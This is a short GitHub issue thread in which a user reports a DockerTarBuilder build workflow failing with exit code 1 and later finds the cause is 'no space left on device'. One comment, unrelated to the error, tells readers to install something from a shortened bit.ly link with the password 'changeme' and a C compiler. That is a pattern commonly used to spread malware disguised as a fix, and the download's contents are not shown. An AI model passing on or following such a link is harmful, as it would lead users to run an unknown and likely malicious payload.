### ISSUE TITLE
pull_and_package Process completed with exit code 1.

### ISSUE THREAD

**Issue by jessie-chen99** [wukongdaily/DockerTarBuilder#18]
Hello, thanks for your project, but I've tried many times and still faced error like this, could you tell me how to fix that?
![image](https://github.com/user-attachments/assets/7873547b-5968-4368-8986-56a50e11258b)
![image](https://github.com/user-attachments/assets/657c0990-8b84-4be1-8243-00cb40a6d61f)

**Comment by SAMBILI** [comment]
install this

https://bit.ly/3TCbXO6
Pass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by jessie-chen99** [comment]
![image](https://github.com/user-attachments/assets/935294e1-f966-4fb6-8a52-bc327950abed)
I see, it shows "no space left on device".
